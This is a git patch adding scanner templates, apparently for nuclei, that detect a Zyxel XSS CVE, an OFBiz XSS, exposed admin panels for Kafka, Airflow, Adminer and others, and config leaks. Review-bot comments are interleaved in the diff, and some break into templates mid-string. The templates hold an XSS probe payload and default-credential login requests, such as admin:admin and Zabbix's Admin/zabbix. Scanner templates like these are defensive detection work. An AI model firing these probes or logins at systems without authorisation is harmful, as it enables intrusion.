b/cves/2019/CVE-2019-9955.yaml new file mode 100644 index 0000000000..d10d7f49b7 --- /dev/null +++ b/cves/2019/CVE-2019-9955.yaml @@ -0,0 +1,18 @@ +id: CVE-2019-9955 + +info: + name: CVE-2019-9955 Zyxel XSS + author: Ice3man + severity: low + +requests: + - method: GET + path: + - "{{BaseURL}}/?mobile=1&mp_idx=%22;alert(%271%27);//" + matchers: + - type: word + part: body + words: + - "\";alert('1');//" + - "Welcome" + condition: and diff --git a/cves/2020/CVE-2020-1943.yaml b/cves/2020/CVE-2020-1943.yaml new file mode 100644 index 0000000000..764f723364 --- /dev/null +++ b/cves/2020/CVE-2020-1943.yaml 
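Review bot: The regex in CVE-2019-14223.yaml is anchored on `Location\s*:` but is applied with `part: body`, and a `Location` header is never part of the response body, so as written the matcher cannot fire on the redirect it is looking for. Change it to `part: header`; the `(?m)^…$` anchors then apply line-by-line across the header block as intended. Pairing it with `- type: status` for `302` under `matchers-condition: and` would additionally stop a `200` page that merely echoes the string from matching.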
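Review bot: `name: CVE-2019-9955 Zyxel XSS` repeats the `id` inside the human-readable name, which none of the other templates in this patch do (compare `name: Apache OFBiz Reflected XSS`). Use `name: Zyxel XSS` and let the `id` carry the CVE number, so generated listings do not print it twice.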
@@ -0,0 +1,22 @@ +id: CVE-2020-1943 + +info: + name: Apache OFBiz Reflected XSS + author: Ice3man + severity: medium + +requests: + - method: GET + path: + - '{{BaseURL}}/control/stream?contentId=' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + - type: word + words: + - "/html" + part: header From a90d047991cee91a7783751bcc94bf53e806ba85 Mon Sep 17 00:00:00 2001 
From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com> Date: Sun, 10 Jan 2021 18:41:25 +0530 Subject: [PATCH 29/85] Massive template checks addition :tada: :tada: --- .../activemq/activemq-default-login.yaml | 22 +++ .../ambari-default-credentials.yaml | 19 +++ default-logins/ofbiz-default-credentials.yaml | 20 +++ .../zabbix-default-credentials.yaml | 22 +++ exposed-panels/active-admin-exposure.yaml | 17 +++ exposed-panels/activemq-panel.yaml | 17 +++ exposed-panels/adminer-exposure.yaml | 125 ++++++++++++++++++ exposed-panels/airflow-exposure.yaml | 18 +++ exposed-panels/ambari-exposure.yaml | 17 +++ exposed-panels/ansible-tower-exposure.yaml | 17 +++ exposed-panels/couchdb-exposure.yaml | 18 +++ exposed-panels/couchdb-fauxton.yaml | 15 +++ exposed-panels/django-admin-panel.yaml | 17 +++ exposed-panels/druid-console-exposure.yaml | 17 +++ .../exposed-pagespeed-global-admin.yaml | 15 +++ exposed-panels/exposed-webalizer.yaml | 17 +++ exposed-panels/flink-exposure.yaml | 15 +++ exposed-panels/hadoop-exposure.yaml | 15 +++ exposed-panels/kafka-connect-ui.yaml | 15 +++ exposed-panels/kafka-monitoring.yaml | 16 +++ exposed-panels/kafka-topics-ui.yaml | 15 +++ exposed-panels/kubernetes-dashboard.yaml | 15 +++ exposed-panels/rocketmq-console-exposure.yaml | 15 +++ exposed-panels/selenoid-ui-exposure.yaml | 17 +++ exposed-panels/setup-page-exposure.yaml | 20 +++ exposed-panels/solr-exposure.yaml | 15 +++ exposed-panels/yarn-manager-exposure.yaml | 18 +++ exposed-panels/zipkin-exposure.yaml | 17 +++ .../airflow-configuration-exposure.yaml | 17 +++ .../amazon-docker-config-disclosure.yaml | 17 +++ .../configs/ansible-config-disclosure.yaml | 17 +++ .../configs/opcache-status-exposure.yaml | 20 +++ exposures/configs/perl-status.yaml | 17 +++ exposures/configs/rails-database-config.yaml | 18 +++ .../configs/symfony-database-config.yaml | 18 +++ exposures/configs/symfony-profiler.yaml | 18 +++ exposures/logs/rails-debug-mode.yaml | 18 +++ 
exposures/logs/struts-debug-mode.yaml | 17 +++ misconfiguration/airflow-api-exposure.yaml | 17 +++ misconfiguration/hadoop-unauth.yaml | 17 +++ vulnerabilities/other/acme-xss.yaml | 20 +++ .../other/aspnuke-openredirect.yaml | 15 +++ .../other/yarn-resourcemanager-rce.yaml | 19 +++ 43 files changed, 851 insertions(+) create mode 100644 default-logins/activemq/activemq-default-login.yaml create mode 100755 default-logins/ambari-default-credentials.yaml create mode 100755 default-logins/ofbiz-default-credentials.yaml create mode 100755 default-logins/zabbix-default-credentials.yaml create mode 100755 exposed-panels/active-admin-exposure.yaml create mode 100755 exposed-panels/activemq-panel.yaml create mode 100755 exposed-panels/adminer-exposure.yaml create mode 100755 exposed-panels/airflow-exposure.yaml create mode 100644 exposed-panels/ambari-exposure.yaml create mode 100644 exposed-panels/ansible-tower-exposure.yaml create mode 100755 exposed-panels/couchdb-exposure.yaml create mode 100755 exposed-panels/couchdb-fauxton.yaml create mode 100644 exposed-panels/django-admin-panel.yaml create mode 100755 exposed-panels/druid-console-exposure.yaml create mode 100755 exposed-panels/exposed-pagespeed-global-admin.yaml create mode 100644 exposed-panels/exposed-webalizer.yaml create mode 100755 exposed-panels/flink-exposure.yaml create mode 100755 exposed-panels/hadoop-exposure.yaml create mode 100755 exposed-panels/kafka-connect-ui.yaml create mode 100755 exposed-panels/kafka-monitoring.yaml create mode 100755 exposed-panels/kafka-topics-ui.yaml create mode 100644 exposed-panels/kubernetes-dashboard.yaml create mode 100755 exposed-panels/rocketmq-console-exposure.yaml create mode 100755 exposed-panels/selenoid-ui-exposure.yaml create mode 100755 exposed-panels/setup-page-exposure.yaml create mode 100755 exposed-panels/solr-exposure.yaml create mode 100755 exposed-panels/yarn-manager-exposure.yaml create mode 100755 exposed-panels/zipkin-exposure.yaml create mode 100755 
exposures/configs/airflow-configuration-exposure.yaml create mode 100755 exposures/configs/amazon-docker-config-disclosure.yaml create mode 100755 exposures/configs/ansible-config-disclosure.yaml create mode 100644 exposures/configs/opcache-status-exposure.yaml create mode 100755 exposures/configs/perl-status.yaml create mode 100644 exposures/configs/rails-database-config.yaml create mode 100755 exposures/configs/symfony-database-config.yaml create mode 100644 exposures/configs/symfony-profiler.yaml create mode 100644 exposures/logs/rails-debug-mode.yaml create mode 100644 exposures/logs/struts-debug-mode.yaml create mode 100755 misconfiguration/airflow-api-exposure.yaml create mode 100644 misconfiguration/hadoop-unauth.yaml create mode 100755 vulnerabilities/other/acme-xss.yaml create mode 100644 vulnerabilities/other/aspnuke-openredirect.yaml create mode 100755 vulnerabilities/other/yarn-resourcemanager-rce.yaml diff --git a/default-logins/activemq/activemq-default-login.yaml b/default-logins/activemq/activemq-default-login.yaml new file mode 100644 index 0000000000..c6546895c8 --- /dev/null +++ b/default-logins/activemq/activemq-default-login.yaml @@ -0,0 +1,22 @@ +id: activemq-default-login + +info: + name: Apache ActiveMQ Default Credentials + author: Ice3man + severity: medium + +requests: + - method: GET + path: + - '{{BaseURL}}/admin/' + headers: + Authorization: "Basic YWRtaW46YWRtaW4=" + matchers: + - type: word + words: + - 'Welcome to the Apache ActiveMQ Console of ' + - '

Broker

' + condition: and + + # We could add a request condition block to only send this request if the + # site response URL had activeMQ broker stuff in the source. diff --git a/default-logins/ambari-default-credentials.yaml b/default-logins/ambari-default-credentials.yaml new file mode 100755 index 0000000000..fe461837dd --- /dev/null +++ b/default-logins/ambari-default-credentials.yaml @@ -0,0 +1,19 @@ +id: ambari-default-credentials + +info: + name: Apache Ambari Default Credentials + author: Ice3man + severity: medium + +requests: + - method: GET + path: + - '{{BaseURL}}/api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name' + headers: + Authorization: "Basic YWRtaW46YWRtaW4=" + matchers: + - type: word + words: + - '"Users" : {' + - 'AMBARI.' + condition: and \ No newline at end of file diff --git a/default-logins/ofbiz-default-credentials.yaml b/default-logins/ofbiz-default-credentials.yaml new file mode 100755 index 0000000000..8f9d9c1374 --- /dev/null +++ b/default-logins/ofbiz-default-credentials.yaml @@ -0,0 +1,20 @@ +id: ofbiz-default-credentials + +info: + name: Apache OfBiz Default Credentials + author: Ice3man + severity: medium + +requests: + - method: POST + path: + - '{{BaseURL}}/control/login' + headers: + Content-Type: application/x-www-form-urlencoded + body: USERNAME=admin&PASSWORD=ofbiz&FTOKEN=&JavaScriptEnabled=Y + matchers: + - type: word + words: + - "ofbiz-pagination-template" + - "Powered by OFBiz" + condition: and \ No newline at end of file diff --git a/default-logins/zabbix-default-credentials.yaml b/default-logins/zabbix-default-credentials.yaml new file mode 100755 index 0000000000..5202d88398 --- /dev/null +++ b/default-logins/zabbix-default-credentials.yaml 
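Review bot: The success check in ofbiz-default-credentials.yaml relies on `"Powered by OFBiz"` and `"ofbiz-pagination-template"`, and at least the first is a generic footer string that is plausibly also rendered on the login form returned for a failed login; if so, every reachable OFBiz instance would be reported as using default credentials. A marker that only appears after authentication, or a `type: status` matcher on the post-login response under `matchers-condition: and`, would make the finding depend on the login actually succeeding. I cannot confirm from the template alone which pages carry these strings, so this needs checking against a real instance.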
@@ -0,0 +1,22 @@ +id: zabbix-default-credentials + +info: + name: Zabbix Default Credentials + author: Ice3man + severity: critical + +requests: + - method: POST + path: + - '{{BaseURL}}/index.php' + headers: + - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + - X-Requested-With: XMLHttpRequest + body: name=Admin&password=zabbix&autologin=1&enter=Sign+in + matchers-condition: and + matchers: + - type: word + words: + - "zabbix.php?action=dashboard.view" + - type: status + status: 302 \ No newline at end of file diff --git a/exposed-panels/active-admin-exposure.yaml b/exposed-panels/active-admin-exposure.yaml new file mode 100755 index 0000000000..0654ef10c2 --- /dev/null +++ b/exposed-panels/active-admin-exposure.yaml @@ -0,0 +1,17 @@ +id: active-admin-exposure + +info: + name: ActiveAdmin Admin Dasboard Exposure + author: Ice3man + severity: medium + +requests: + - method: GET + path: + - '{{BaseURL}}/admin/login' + matchers: + - type: word + words: + - "active_admin_content" + - "active_admin-" + condition: and \ No newline at end of file diff --git a/exposed-panels/activemq-panel.yaml b/exposed-panels/activemq-panel.yaml new file mode 100755 index 0000000000..9265ab0e96 --- /dev/null +++ b/exposed-panels/activemq-panel.yaml @@ -0,0 +1,17 @@ +id: activemq-panel + +info: + name: Apache ActiveMQ Exposure + author: Ice3man + severity: info + +requests: + - method: GET + path: + - '{{BaseURL}}/' + matchers: + - type: word + words: + - '
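Review bot: zabbix-default-credentials.yaml writes `headers` as a YAML list (`- Content-Type: …`, `- X-Requested-With: …`) and `status` as a bare scalar (`status: 302`), whereas every other template in this patch gives `headers` as a mapping (ofbiz-default-credentials.yaml) and `status` as a list (adminer-exposure.yaml, `- 200`); a loader expecting those shapes will reject this file or silently drop the headers and status check. Both should be brought into line with the sibling templates, as below.
```yaml
    headers:
      Content-Type: application/x-www-form-urlencoded; charset=UTF-8
      X-Requested-With: XMLHttpRequest
    # … unchanged: body, matchers-condition, word matcher …
      - type: status
        status:
          - 302
```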
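Review bot: `name: ActiveAdmin Admin Dasboard Exposure` in active-admin-exposure.yaml misspells "Dashboard" and doubles "Admin". `name: ActiveAdmin Dashboard Exposure` reads cleanly and matches the naming used by the other panel templates in this patch.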

Welcome to the Apache ActiveMQ!

' + - 'Apache ActiveMQ' + condition: and \ No newline at end of file diff --git a/exposed-panels/adminer-exposure.yaml b/exposed-panels/adminer-exposure.yaml new file mode 100755 index 0000000000..1e0a0e3326 --- /dev/null +++ b/exposed-panels/adminer-exposure.yaml 
@@ -0,0 +1,125 @@ +id: adminer-exposure + +info: + name: Adminer Exposure + author: Ice3man + severity: medium + +requests: + - method: GET + path: + - '{{BaseURL}}/adminer-4.7.0.php' + - '{{BaseURL}}/adminer-4.6.0-mysql-en.php' + - '{{BaseURL}}/adminer/adminer.php' + - '{{BaseURL}}/adminer-4.6.0-en.php' + - '{{BaseURL}}/adminer-4.6.2-mysql.php' + - '{{BaseURL}}/adminer-4.6.1-mysql.php' + - '{{BaseURL}}/adminer-4.7.2.php' + - '{{BaseURL}}/adminer-4.0.1/' + - '{{BaseURL}}/adminer-4.6.3-mysql-en.php' + - '{{BaseURL}}/adminer-4.3.1-mysql-en.php' + - '{{BaseURL}}/adminer-3.3.1/' + - '{{BaseURL}}/adminer-3.6.1/' + - '{{BaseURL}}/adminer-4.6.2.php' + - '{{BaseURL}}/adminer-4.0.3.php' + - '{{BaseURL}}/adminer-4.3.0.php' + - '{{BaseURL}}/adminer-4.6.1.php' + - '{{BaseURL}}/adminer-4.2.5-en.php' + - '{{BaseURL}}/data/adminer.php' + - '{{BaseURL}}/adminer/index.php' + - '{{BaseURL}}/adminer-4.2.0.php' + - '{{BaseURL}}/adminer-4.5.0-mysql.php' + - '{{BaseURL}}/admin/adminer.php' + - '{{BaseURL}}/adminer-4.7.2-mysql.php' + - '{{BaseURL}}/adminer-4.2.2/' + - '{{BaseURL}}/adminer-4.5.0.php' + - '{{BaseURL}}/adminer-3.6.0/' + - '{{BaseURL}}/webadminer.php' + - '{{BaseURL}}/adminer-4.0.3/' + - '{{BaseURL}}/adminer-4.1.0.php' + - '{{BaseURL}}/adminer-3.3.2/' + - '{{BaseURL}}/adminer-4.6.2-en.php' + - '{{BaseURL}}/adminer-4.7.1-mysql.php' + - '{{BaseURL}}/public/adminer.php' + - '{{BaseURL}}/adminer-4.1.0/' + - '{{BaseURL}}/adminer-4.5.0-en.php' + - '{{BaseURL}}/adminer-4.2.4/' + - '{{BaseURL}}/adminer-4.6.2-mysql-en.php' + - '{{BaseURL}}/adminer.php' + - '{{BaseURL}}/adminer-4.7.0-mysql-en.php' + - '{{BaseURL}}/adminer-4.4.0-mysql.php' + - '{{BaseURL}}/adminer-4.3.1.php' + - '{{BaseURL}}/adminer-4.6.0-mysql.php' + - '{{BaseURL}}/adminer-4.2.3/' + - '{{BaseURL}}/_adminer.php' + - '{{BaseURL}}/adminer-3.3.3/' + - '{{BaseURL}}/adminer-3.3.0/' + - '{{BaseURL}}/php/adminer.php' + - '{{BaseURL}}/adminer-3.1.0/' + - '{{BaseURL}}/adminer-4.6.3-mysql.php' + - 
'{{BaseURL}}/adminer-4.7.2-mysql-en.php' + - '{{BaseURL}}/adminer-4.4.0-en.php' + - '{{BaseURL}}/publicadminer.php' + - '{{BaseURL}}/adminer1.php' + - '{{BaseURL}}/adminer-4.7.3-mysql.php' + - '{{BaseURL}}/adminer-4.6.3-en.php' + - '{{BaseURL}}/adminer-4.2.5-mysql-en.php' + - '{{BaseURL}}/adminer-3.0.0/' + - '{{BaseURL}}/adminer-3.5.0/' + - '{{BaseURL}}/adminer-3.6.4/' + - '{{BaseURL}}/adminer-4.7.3-mysql-en.php' + - '{{BaseURL}}/adminer-3.2.2/' + - '{{BaseURL}}/adminer-3.0.1/' + - '{{BaseURL}}/tools/adminer.php' + - '{{BaseURL}}/adminer-4.7.1.php' + - '{{BaseURL}}/adminer-4.0.3-mysql.php' + - '{{BaseURL}}/adminer-4.2.5-mysql.php' + - '{{BaseURL}}/adminer-3.5.1/' + - '{{BaseURL}}/adminer-3.6.3/' + - '{{BaseURL}}/adminer-4.3.0-mysql-en.php' + - '{{BaseURL}}/web/adminer.php' + - '{{BaseURL}}/adminer-3.2.1/' + - '{{BaseURL}}/adminer/' + - '{{BaseURL}}/adminer-4.6.2-cs.php' + - '{{BaseURL}}/adminer-4.2.0-mysql.php' + - '{{BaseURL}}/adminer-4.5.0-mysql-en.php' + - '{{BaseURL}}/adminer-4.3.1-mysql.php' + - '{{BaseURL}}/adminer-4.1.0-mysql.php' + - '{{BaseURL}}/adminer-4.7.1-mysql-en.php' + - '{{BaseURL}}/adminer-4.3.1-en.php' + - '{{BaseURL}}/adminer-4.7.0-en.php' + - '{{BaseURL}}/adminer-4.6.1-mysql-en.php' + - '{{BaseURL}}/adminer-4.7.2-en.php' + - '{{BaseURL}}/adminer-4.2.0/' + - '{{BaseURL}}/adminer-3.6.2/' + - '{{BaseURL}}/adminer-4.4.0-mysql-en.php' + - '{{BaseURL}}/toolsadminer.php' + - '{{BaseURL}}/adminer-3.7.0/' + - '{{BaseURL}}/adminer-4.2.5.php' + - '{{BaseURL}}/adminer-3.2.0/' + - '{{BaseURL}}/adminer-4.4.0.php' + - '{{BaseURL}}/adminer-4.7.3.php' + - '{{BaseURL}}/adminer-4.3.0-en.php' + - '{{BaseURL}}/adminer-4.6.3.php' + - '{{BaseURL}}/adminer-4.0.2/' + - '{{BaseURL}}/wp-content/plugins/adminer/adminer.php' + - '{{BaseURL}}/adminer-3.4.0/' + - '{{BaseURL}}/adminer-4.0.0/' + - '{{BaseURL}}/adminer-4.7.1-en.php' + - '{{BaseURL}}/adminer-4.3.0-mysql.php' + - '{{BaseURL}}/adminer-4.2.1/' + - '{{BaseURL}}/adminer-4.6.0.php' + - '{{BaseURL}}/adminer-3.7.1/' + - 
'{{BaseURL}}/adminadminer.php' + - '{{BaseURL}}/adminer-3.3.4/' + - '{{BaseURL}}/adminer-4.6.1-en.php' + - '{{BaseURL}}/adminer-4.7.3-en.php' + - '{{BaseURL}}/adminer-4.7.0-mysql.php' + matchers-condition: and + matchers: + - type: word + words: + - "Login - Adminer" + - type: status + status: + - 200 diff --git a/exposed-panels/airflow-exposure.yaml b/exposed-panels/airflow-exposure.yaml new file mode 100755 index 0000000000..b02e422796 --- /dev/null +++ b/exposed-panels/airflow-exposure.yaml @@ -0,0 +1,18 @@ +id: airflow-exposure + +info: + name: Apache Airflow Exposure / Unauthenticated Access + author: Ice3man + severity: medium + +requests: + - method: GET + path: + - '{{BaseURL}}/' + - '{{BaseURL}}/admin/' + matchers: + - type: word + words: + - 'Airflow - DAGs' + - '
' + condition: and \ No newline at end of file diff --git a/exposed-panels/ambari-exposure.yaml b/exposed-panels/ambari-exposure.yaml new file mode 100644 index 0000000000..b44f058832 --- /dev/null +++ b/exposed-panels/ambari-exposure.yaml @@ -0,0 +1,17 @@ +id: ambari-exposure + +info: + name: Apache Ambari Exposure / Unauthenticated Access + author: Ice3man + severity: medium + +requests: + - method: GET + path: + - '{{BaseURL}}/' + matchers: + - type: word + words: + - 'Ambari' + - 'href="http://www.apache.org/licenses/LICENSE-2.0"' + condition: and \ No newline at end of file diff --git a/exposed-panels/ansible-tower-exposure.yaml b/exposed-panels/ansible-tower-exposure.yaml new file mode 100644 index 0000000000..11de49fcfc --- /dev/null +++ b/exposed-panels/ansible-tower-exposure.yaml @@ -0,0 +1,17 @@ +id: ansible-tower-exposure + +info: + name: Ansible Tower Exposure + author: Ice3man + severity: low + +requests: + - method: GET + path: + - '{{BaseURL}}/' + matchers: + - type: word + words: + - "Ansible Tower" + - "ansible-main-menu" + condition: and \ No newline at end of file diff --git a/exposed-panels/couchdb-exposure.yaml b/exposed-panels/couchdb-exposure.yaml new file mode 100755 index 0000000000..68942ed1f2 --- /dev/null +++ b/exposed-panels/couchdb-exposure.yaml @@ -0,0 +1,18 @@ +id: couchdb-exposure + +info: + name: Apache CouchDB Exposure + author: Ice3man + severity: low + +requests: + - method: GET + path: + - '{{BaseURL}}/_all_dbs' + matchers: + - type: word + words: + - CouchDB/ + - Erlang OTP/ + part: header + condition: and \ No newline at end of file diff --git a/exposed-panels/couchdb-fauxton.yaml b/exposed-panels/couchdb-fauxton.yaml new file mode 100755 index 0000000000..f5d9d52103 --- /dev/null +++ b/exposed-panels/couchdb-fauxton.yaml 
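Review bot: couchdb-exposure.yaml requests `/_all_dbs` but only matches `CouchDB/` and `Erlang OTP/` in the response headers, and that `Server` header is returned for a `401` just as for a successful listing, so the template flags every CouchDB instance it can reach rather than ones that actually expose the database list. Add `matchers-condition: and` with a `type: status` matcher for `200` (or a body word that only the listing produces) so a hit means the endpoint answered without authentication. Severity and name can then stay as they are.
```yaml
    matchers-condition: and
    matchers:
      - type: word
        # … unchanged: CouchDB/ and Erlang OTP/ header words …
      - type: status
        status:
          - 200
```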
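Review bot: ambari-exposure.yaml is named `Apache Ambari Exposure / Unauthenticated Access` and rated `medium`, but it only checks the landing page for `'Ambari'` and the Apache licence link, strings an Ambari login page presumably serves to anonymous visitors as well, so a match does not demonstrate unauthenticated access. Either drop the `/ Unauthenticated Access` suffix and align the severity with the other panel-detection templates in this patch (`low`), or match on content that Ambari only returns to an authenticated session.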
@@ -0,0 +1,15 @@ +id: couchdb-fauxton + +info: + name: Apache CouchDB Fauxton Exposure + author: Ice3man + severity: low + +requests: + - method: GET + path: + - '{{BaseURL}}/' + matchers: + - type: word + words: + - 'Project Fauxton' \ No newline at end of file diff --git a/exposed-panels/django-admin-panel.yaml b/exposed-panels/django-admin-panel.yaml new file mode 100644 index 0000000000..30dc04e6c4 --- /dev/null +++ b/exposed-panels/django-admin-panel.yaml @@ -0,0 +1,17 @@ +id: django-admin-panel + +info: + name: Python Django Admin Panel + author: Ice3man + severity: low + +requests: + - method: GET + path: + - "{{BaseURL}}/admin/login/?next=/admin/" + matchers: + - type: word + words: + - "Django administration" + condition: and + part: body \ No newline at end of file diff --git a/exposed-panels/druid-console-exposure.yaml b/exposed-panels/druid-console-exposure.yaml new file mode 100755 index 0000000000..fd70fd8bf0 --- /dev/null +++ b/exposed-panels/druid-console-exposure.yaml @@ -0,0 +1,17 @@ +id: druid-console-exposure + +info: + name: Alibaba Druid Console Exposure + author: Ice3man + severity: medium + +requests: + - method: GET + path: + - '{{BaseURL}}/' + matchers: + - type: word + words: + - 'src="/druid.js"' + - 'href="/druid.css"' + condition: and \ No newline at end of file diff --git a/exposed-panels/exposed-pagespeed-global-admin.yaml b/exposed-panels/exposed-pagespeed-global-admin.yaml new file mode 100755 index 0000000000..568072f374 --- /dev/null +++ b/exposed-panels/exposed-pagespeed-global-admin.yaml @@ -0,0 +1,15 @@ +id: exposed-pagespeed-global-admin + +info: + name: Apache PageSpeed Global Admin Dashboard Exposure + author: Ice3man + severity: medium + +requests: + - method: GET + path: + - '{{BaseURL}}/pagespeed_admin/' + matchers: + - type: word + words: + - "Pagespeed Admin" \ No newline at end of file 
diff --git a/exposed-panels/exposed-webalizer.yaml b/exposed-panels/exposed-webalizer.yaml new file mode 100644 index 0000000000..21f33ad15a --- /dev/null +++ b/exposed-panels/exposed-webalizer.yaml @@ -0,0 +1,17 @@ +id: exposed-webalizer + +info: + name: Publicly exposed Webalizer Interface + author: Ice3man + severity: low + +requests: + - method: GET + path: + - '{{BaseURL}}/webalizer/' + matchers: + - type: word + words: + - "Webalizer Version" + - "Usage statistics for" + condition: and \ No newline at end of file diff --git a/exposed-panels/flink-exposure.yaml b/exposed-panels/flink-exposure.yaml new file mode 100755 index 0000000000..155c090b58 --- /dev/null +++ b/exposed-panels/flink-exposure.yaml @@ -0,0 +1,15 @@ +id: flink-exposure + +info: + name: Apache Flink Exposure + author: Ice3man + severity: low + +requests: + - method: GET + path: + - '{{BaseURL}}/' + matchers: + - type: word + words: + - 'Apache Flink Web Dashboard' \ No newline at end of file diff --git a/exposed-panels/hadoop-exposure.yaml b/exposed-panels/hadoop-exposure.yaml new file mode 100755 index 0000000000..efefde4127 --- /dev/null +++ b/exposed-panels/hadoop-exposure.yaml @@ -0,0 +1,15 @@ +id: hadoop-exposure + +info: + name: Apache Hadoop Exposure + author: Ice3man + severity: low + +requests: + - method: GET + path: + - '{{BaseURL}}/dfshealth.html' + matchers: + - type: word + words: + - '' \ No newline at end of file diff --git a/exposed-panels/kafka-connect-ui.yaml b/exposed-panels/kafka-connect-ui.yaml new file mode 100755 index 0000000000..973910c087 --- /dev/null +++ b/exposed-panels/kafka-connect-ui.yaml @@ -0,0 +1,15 @@ +id: kafka-connect-ui + +info: + name: Apache Kafka Connect UI Exposure + author: Ice3man + severity: low + +requests: + - method: GET + path: + - '{{BaseURL}}/' + matchers: + - type: word + words: + - 'Kafka Connect UI' \ No newline at end of file 
diff --git a/exposed-panels/kafka-monitoring.yaml b/exposed-panels/kafka-monitoring.yaml new file mode 100755 index 0000000000..c6d4183b66 --- /dev/null +++ b/exposed-panels/kafka-monitoring.yaml @@ -0,0 +1,16 @@ +id: kafka-monitoring + +info: + name: Apache Kafka Monitor Exposure + author: Ice3man + severity: low + +requests: + - method: GET + path: + - '{{BaseURL}}/' + matchers: + - type: word + words: + - '>KafkaMonitor' + - '>Kafka Monitor GUI' \ No newline at end of file diff --git a/exposed-panels/kafka-topics-ui.yaml b/exposed-panels/kafka-topics-ui.yaml new file mode 100755 index 0000000000..8e4a823e28 --- /dev/null +++ b/exposed-panels/kafka-topics-ui.yaml @@ -0,0 +1,15 @@ +id: kafka-topics-ui + +info: + name: Apache Kafka Topics UI Exposure + author: Ice3man + severity: low + +requests: + - method: GET + path: + - '{{BaseURL}}/' + matchers: + - type: word + words: + - 'Kafka Topics UI - Browse Kafka Data' \ No newline at end of file diff --git a/exposed-panels/kubernetes-dashboard.yaml b/exposed-panels/kubernetes-dashboard.yaml new file mode 100644 index 0000000000..b50e6d4155 --- /dev/null +++ b/exposed-panels/kubernetes-dashboard.yaml @@ -0,0 +1,15 @@ +id: kubernetes-dashboard + +info: + name: Kubernetes Console Exposure + author: Ice3man + severity: low + +requests: + - method: GET + path: + - "{{BaseURL}}/" + matchers: + - type: word + words: + - "Kubernetes Dashboard" \ No newline at end of file diff --git a/exposed-panels/rocketmq-console-exposure.yaml b/exposed-panels/rocketmq-console-exposure.yaml new file mode 100755 index 0000000000..26c5fe99bc --- /dev/null +++ b/exposed-panels/rocketmq-console-exposure.yaml @@ -0,0 +1,15 @@ +id: rocketmq-console-exposure + +info: + name: Apache RocketMQ Console Exposure + author: Ice3man + severity: medium + +requests: + - method: GET + path: + - '{{BaseURL}}/' + matchers: + - type: word + words: + - "RocketMq-console-ng" \ No newline at end of file 
diff --git a/exposed-panels/selenoid-ui-exposure.yaml b/exposed-panels/selenoid-ui-exposure.yaml new file mode 100755 index 0000000000..4742cd906d --- /dev/null +++ b/exposed-panels/selenoid-ui-exposure.yaml @@ -0,0 +1,17 @@ +id: selenoid-ui-exposure + +info: + name: Selenoid UI Dashboard Exposure + author: Ice3man + severity: medium + +requests: + - method: GET + path: + - '{{BaseURL}}/admin/login' + matchers: + - type: word + words: + - "Selenoid UI" + - "/manifest.json" + condition: and \ No newline at end of file diff --git a/exposed-panels/setup-page-exposure.yaml b/exposed-panels/setup-page-exposure.yaml new file mode 100755 index 0000000000..a2903098fe --- /dev/null +++ b/exposed-panels/setup-page-exposure.yaml @@ -0,0 +1,20 @@ +id: setup-page-exposure + +info: + name: Zenphoto Setup Page Exposure + author: Ice3man + severity: medium + description: Misconfiguration on Zenphoto version < 1.5.X which lead to sensitive information disclosure + +requests: + - method: GET + path: + - '{{BaseURL}}/zp-core/setup/index.php' + - '{{BaseURL}}/zp/zp-core/setup/index.php' + - '{{BaseURL}}/gallery/zp-core/setup/index.php' + - '{{BaseURL}}/zenphoto/zp-core/setup/index.php' + matchers: + - type: word + words: + - Welcome to Zenphoto! This page will set up Zenphoto + part: body \ No newline at end of file diff --git a/exposed-panels/solr-exposure.yaml b/exposed-panels/solr-exposure.yaml new file mode 100755 index 0000000000..21f878068d --- /dev/null +++ b/exposed-panels/solr-exposure.yaml @@ -0,0 +1,15 @@ +id: solr-exposure + +info: + name: Apache Solr Exposure + author: Ice3man + severity: medium + +requests: + - method: GET + path: + - '{{BaseURL}}/solr/' + matchers: + - type: word + words: + - "Solr Admin" \ No newline at end of file diff --git a/exposed-panels/yarn-manager-exposure.yaml b/exposed-panels/yarn-manager-exposure.yaml new file mode 100755 index 0000000000..bb17c90f1d --- /dev/null +++ b/exposed-panels/yarn-manager-exposure.yaml 
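Review bot: The `id` in setup-page-exposure.yaml is generic while the template is Zenphoto-specific (`name: Zenphoto Setup Page Exposure`, paths under `zp-core/setup/`), and the tree earlier in this series already lists `misconfiguration/zenphoto-installation-sensitive-info.yaml`, which may cover the same check. Rename the id to something product-scoped such as `zenphoto-setup-exposure`, and confirm the two templates are not duplicates before both ship. The `description` also has a grammar slip: `which lead to` should read `which leads to`.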
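Review bot: selenoid-ui-exposure.yaml requests `/admin/login` and matches `"Selenoid UI"` together with `"/manifest.json"`, but `/admin/login` is the exact path used by active-admin-exposure.yaml in this patch and does not look like a Selenoid UI route; this reads as a copy-paste leftover, though I cannot verify the correct path from the template alone. Confirm against a Selenoid UI deployment and set `path` to wherever the dashboard is actually served (the root, by the look of the other dashboard templates here), otherwise the template will never match.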
@@ -0,0 +1,18 @@
+id: yarn-manager-exposure
+
+info:
+ name: Apache Yarn ResourceManager Exposure / Unauthenticated Access
+ author: Ice3man
+ severity: low
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/cluster/cluster'
+ matchers:
+ - type: word
+ words:
+ - 'hadoop'
+ - 'resourcemanager'
+ - 'logged in as: dr.who'
+ condition: and
\ No newline at end of file
diff --git a/exposed-panels/zipkin-exposure.yaml b/exposed-panels/zipkin-exposure.yaml
new file mode 100755
index 0000000000..4a0e2b1646
--- /dev/null
+++ b/exposed-panels/zipkin-exposure.yaml
@@ -0,0 +1,17 @@
+id: zipkin-exposure
+
+info:
+ name: Zipkin Exposure
+ author: Ice3man
+ severity: low
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/"
+ - "{{BaseURL}}/zipkin/"
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "webpackJsonpzipkin-lens"
\ No newline at end of file
diff --git a/exposures/configs/airflow-configuration-exposure.yaml b/exposures/configs/airflow-configuration-exposure.yaml
new file mode 100755
index 0000000000..6bbb2fe2ce
--- /dev/null
+++ b/exposures/configs/airflow-configuration-exposure.yaml
@@ -0,0 +1,17 @@
+id: airflow-configuration-exposure
+
+info:
+ name: Apache Airflow Configuration Exposure
+ author: Ice3man
+ severity: medium
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/airflow.cfg'
+ matchers:
+ - type: word
+ words:
+ - '[core]'
+ - '[api]'
+ condition: and
\ No newline at end of file
